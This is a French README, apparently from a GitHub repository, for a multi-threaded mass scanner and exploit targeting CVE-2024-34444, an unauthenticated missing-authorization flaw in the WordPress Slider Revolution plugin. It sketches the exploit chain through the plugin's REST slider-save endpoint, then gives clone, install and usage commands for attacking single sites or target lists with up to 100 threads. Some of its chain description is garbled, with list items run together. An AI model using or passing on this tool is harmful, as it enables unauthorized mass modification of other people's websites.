
Scanner de masse multi-thread pour CVE-2024-34444 (autorisation manquante) dans le plugin WordPress Slider Revolution. Automatise l'extraction de nonce, la détection de version et l'exploitation via l'API REST pour la modification non authentifiée des données du slider.
Scanner de masse professionnel pour CVE-2024-34444 affectant le plugin WordPress Slider Revolution < 6.7.0
Banner
CVE-2024-34444 est une vulnérabilité de type Missing Authorization (autorisation manquante) dans le plugin WordPress Slider Revolution (versions < 6.7.0). Ce scanner automatise la détection et l'exploitation des installations vulnérables via le point de terminaison REST API /wp-json/revslider/v1/slider/save.
Chaîne d'exploitation de la vulnérabilité :
revslider_actions depuis le frontend (accessible publiquement)check_nonce() dans l'API RESTreadme.txt-v) pour une journalisation détaillée-o) pour enregistrer les résultatsgit clone https://github.com/dzmind2312/CVE-2024-34444.git
cd CVE-2024-34444
pip3 install -r requirements.txt
# Cible unique
python3 exploit.py -u https://target.com
# Cible unique avec mode verbeux
python3 exploit.py -u https://target.com -v
# Scan de masse à partir d'une liste
python3 exploit.py -l targets.txt -t 20
# Scan de masse avec fichier de sortie
python3 exploit.py -l sites.txt -t 50 -o vulnerable.txt
# Exemple complet avec toutes les options
python3 exploit.py -l targets.txt -t 100 -o results.txt -v